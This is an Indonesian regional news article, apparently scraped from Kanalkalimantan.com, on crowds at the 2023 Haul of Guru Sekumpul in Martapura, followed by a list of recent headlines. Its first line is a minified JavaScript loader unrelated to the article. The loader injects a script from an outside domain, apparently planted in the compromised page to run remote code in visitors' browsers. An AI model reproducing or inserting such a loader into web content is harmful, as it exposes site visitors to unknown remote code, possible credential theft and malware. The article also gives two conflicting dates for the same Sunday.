(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Luapan Jemaah Haul ke-18 Guru Sekumpul Tahun 2023 Memenuhi Seluruh Jalan


KANALKALIMANTAN.COM, MARTAPURA – Luapan jemaah Haul ke-18 Guru Sekumpul memenuhi hampir seluruh jalan di kawasan Martapura Kota, Minggu (20/1/2023) sore hingga petang.

Kepadatan mulai terjadi dari arah Kota Banjarbaru yakni Bundaran Simpang Empat. Bahkan, Bundaran Simpang Empat Banjarbaru arah ke Martapura ditutup sejak pukul 15.00 Wita.

Jemaah yang baru datang pun diarahkan ke arah Sungai Ulin menuju jalan jalan pintas yang dijadikan titik kantong parkir.

Seluruh kantong parkir yang disiapkan relawan telah terisi 95 persen dengan peningkatan jumlah jemaah yang datang ke Martapura sekitar 30 persen.

 

Baca juga : Pimpin Apel Kesiapan Haul Abah Guru Sekumpul, Ini Harapan Bupati Banjar

“Jemaah mulai Banjarbaru Banjarmasin diarahkan ke arah Sungai Ulin dan ikuti arahan petugas relawan,” ucap seorang relawan.

Diketahui banyak rombongan jemaah yang datang dari berbagai penjuru daerah, bahkan luar pulau.

Seperti Rohmah yang datang bersama orang tuanya dari Kabupaten Paser Kalimantan Timur. Dirinya berangkat ke Kalimantan Selatan pada hari Jumat dengan menggunakan transportasi darat.

“Jadi kami sampainya Sabtu kemarin naik mobil dari Kaltim. Kami pun menginap di Masjid, kadang juga di rest area, jadi ganti ganti sampai hari ini,” ucap Rohmah, jemaah asal Kabupaten Paser Kalimantan Timur, Minggu (29/1/2023).

Rohmah mengungkapkan baru pertama kali mengikuti kegiatan Haul Guru Sekumpul itu. Ia pun diajak orang tuanya yang sudah dua kali mengikuti Haul.

Baca juga  : Fenomena Alam Terjadi di Langit Basirih

“Saya pengen banget tahu gimana rasanya ikut Haul Guru Sekumpul ini karena pas diceritain orang tua katanya bahkan jemaahnya lebih besar dari tahun ini,” ungkapnya.

Rohmah pun tak menyangka akan sebanyak ini masyarakat yang mencintai Guru Sekumpul.

Sementara terpantau pada Minggu petang, sejumlah jalan pintas dan gang menuju Jalan Utama Sekumpul sudah dipenuhi jemaah yang menggelar tikar dan sajadahnya untuk bersiap-siap melakukan sholat magrib berjamaah.

Kebanyakan dari mereka yang berada di depan jalan merupakan shaf laki-laki yang sudah penuh hingga ke belakang. Bahkan di rumah-rumah warga juga banyak jemaah yang menumpang untuk menggelar sajadah. (Kanalkalimantan.com/wanda)

Reporter : wanda
Editor : cell


Desy Arfianty

Recent Posts

Kunker DPRD Kapuas Perkaya Referensi Raperda Bangunan Gedung

KANALKALIMANTAN.COM, KUALA KAPUAS – Panitia Khusus (Pansus) I Dewan Perwakilan Rakyat Daerah (DPRD) Kabupaten Kapuas… Read More

28 menit ago

Haul Dua Wali Allah di Cempaka yang Sangat Dermawan dan Hidup Sederhana

KANALKALIMANTAN.COM, BANJARBARU - Haul Syarifah Badrun Al Qadiri Al Hasani bin Sayyid Yusuf Al-Qadiri Al-Hasani… Read More

3 jam ago

Peringati Hari Buruh, PLN Tebar Kebaikan untuk Petugas Kebersihan Kebun Raya Banua

KANALKALIMANTAN.COM, BANJARBARU - PT PLN (Persero) Unit Induk Penyaluran dan Pusat Pengatur Beban (UIP3B) Kalimantan… Read More

4 jam ago

Jhonny Iskandar Meninggal Dunia, Ini Profil Pelantun “Bukan Pengemis Cinta”

KANALKALIMANTAN.COM - Penyanyi senior Jhonny Iskandar meninggal dunia hari ini, Jumat (10/5/2024). Eks personel Orkes… Read More

6 jam ago

TMMD di Desa Sungai Karias Bangun Ulang Rumah Tak Layak Huni

KANALKALIMANTAN.COM, AMUNTAI – Membangun ulang Rumah Tidak Layak Huni (RTLH) menjadi layak huni menjadi salah… Read More

6 jam ago

Lepas Atlet ke Popda Kalsel, Ini Kata Ketua DPRD Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Target juara umum kontingen Kota Banjarbaru dalam ajang Pekan Olahraga Pelajar Daerah… Read More

7 jam ago

This website uses cookies.